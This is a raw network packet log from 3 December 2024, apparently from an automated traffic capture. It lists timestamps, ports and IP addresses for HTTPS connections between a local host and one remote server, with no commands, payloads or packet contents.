Dec 3, 2024 14:28:12.700186968 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.700208902 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.700220108 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.700232983 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.700306892 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.700311899 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.700376987 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.700459957 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.707535982 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.707937002 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.707953930 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.708149910 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.708235025 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.708311081 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.708390951 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.708451033 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.708563089 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.708628893 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.708658934 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.708708048 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.708741903 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.715828896 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.716265917 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.716285944 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.716293097 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.716309071 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.716350079 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.716394901 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.716480017 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.716640949 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.716707945 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.716773033 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.716816902 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.716861010 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.716919899 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.759341002 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.759659052 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.759778976 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.759841919 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.759955883 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.760092020 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.760164976 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.760210037 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.760251999 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.760296106 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.760343075 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.803330898 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.803595066 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.803716898 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.803970098 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.803980112 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.803993940 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.803993940 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.804016113 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.804075003 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.804135084 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.804187059 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.804231882 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.818237066 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.818602085 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.818681955 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.818697929 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.818711042 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.818864107 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.818908930 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.818970919 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.818989038 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.819077969 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.819111109 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.819123983 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.819228888 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.819264889 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.829710960 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.830007076 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.830024004 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.830107927 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.837430000 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.837486982 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.837539911 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.837568998 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.837644100 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.837883949 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.837985039 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.838035107 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.838114977 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.839067936 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.839224100 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.839227915 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.839262962 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.839298964 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.839318037 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.839349985 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.839404106 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.839412928 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.839538097 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.839641094 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.839679956 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.839708090 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.839747906 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.839775085 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.839828968 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.848186970 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.848241091 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.848402023 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.848417997 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.848432064 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.848635912 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.848644972 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.848741055 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.848787069 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.848839998 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.848891973 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.848937035 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.848973989 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.849040985 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.849086046 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.891338110 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.940977097 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.941097021 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.941107035 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.941138029 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.941205025 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.941234112 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.941412926 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.955463886 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.955478907 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.955579042 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.955596924 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.955622911 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.955648899 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.955666065 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.955790043 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.955939054 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.956028938 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.956087112 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.956147909 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.956259012 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.967873096 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.967920065 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.968020916 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.968034983 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.968063116 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.968089104 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.968106031 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.968174934 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.968272924 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.968384981 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.968441010 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.968564034 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.974297047 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.974345922 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.974538088 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:13.079996109 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:13.192656994 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:15.493916035 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:15.494081020 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:15.494128942 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:15.494184971 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:15.494515896 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:15.494554043 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:15.494740963 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:15.494798899 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:15.494816065 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:15.659894943 CET	49816	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:15.659943104 CET	443	49816	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:15.663440943 CET	49816	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:15.663701057 CET	49816	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:15.663726091 CET	443	49816	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:15.798259974 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:15.798331022 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:15.798358917 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:15.798404932 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:15.798427105 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:15.798450947 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:15.798768044 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:15.798784971 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:15.956998110 CET	49817	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:15.957052946 CET	443	49817	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:15.957134962 CET	49817	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:15.957484961 CET	49817	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:15.957496881 CET	443	49817	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:17.075098991 CET	443	49816	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:17.075330973 CET	49816	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:17.077233076 CET	49816	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:17.077248096 CET	443	49816	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:17.077506065 CET	443	49816	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:17.077559948 CET	49816	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:17.077965975 CET	49816	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:17.078093052 CET	49816	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:17.078114986 CET	443	49816	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:17.319762945 CET	443	49817	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:17.319897890 CET	49817	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:17.320878029 CET	49817	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:17.320893049 CET	443	49817	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:17.321191072 CET	49817	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:17.321194887 CET	443	49817	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:17.321333885 CET	49817	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:17.321338892 CET	443	49817	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:17.736794949 CET	443	49816	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:17.736866951 CET	443	49816	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:17.736866951 CET	49816	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:17.736911058 CET	49816	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:17.737248898 CET	49816	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:17.737268925 CET	443	49816	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:17.902973890 CET	443	49817	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:17.903044939 CET	443	49817	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:17.903124094 CET	49817	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:17.903147936 CET	49817	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:17.903837919 CET	49817	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:17.903853893 CET	443	49817	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:23.373209000 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:23.373291969 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:23.373373032 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:23.373681068 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:23.373692989 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:23.754065990 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:23.754132986 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:23.754211903 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:23.754465103 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:23.754475117 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.786370039 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.786478996 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.786899090 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.786909103 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.787141085 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.787146091 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.787327051 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.787343025 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.787450075 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.787467003 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.787655115 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.787677050 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.787815094 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.787832975 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.787842989 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.787847996 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.787909985 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.787916899 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788068056 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788079023 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788099051 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788115978 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788156033 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788163900 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788172960 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788178921 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788194895 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788202047 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788253069 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788264036 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788278103 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788284063 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788299084 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788305044 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788340092 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788351059 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788403034 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788419962 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788427114 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788429022 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788486004 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788495064 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788502932 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788506985 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788530111 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788536072 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788594961 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788605928 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788624048 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788634062 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788688898 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788697004 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788705111 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788712025 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788732052 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788738966 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788817883 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788825035 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788837910 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788846016 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788851976 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788853884 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788958073 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788969994 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.788990021 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.788996935 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.789004087 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.789009094 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.789026022 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.789033890 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.789092064 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.789119005 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.789164066 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.789177895 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.789192915 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.789237976 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.789329052 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.789402008 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.789457083 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.789525986 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.789546967 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.835330009 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.835602045 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.835643053 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.835716009 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.835779905 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.835798979 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.835917950 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.835938931 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.835979939 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.835997105 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.836013079 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.836045027 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.883323908 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.890117884 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.890254021 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.890311956 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.890330076 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.890441895 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.890562057 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.890599012 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.890609026 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.890619993 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.890660048 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.890670061 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.890688896 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.935334921 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.936429977 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.936708927 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.940821886 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.940992117 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.941090107 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.941153049 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.941206932 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.941232920 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.941283941 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.941333055 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.983325958 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:24.983616114 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.983695030 CET	49834	443	192.168.2.5	149.154.167.220
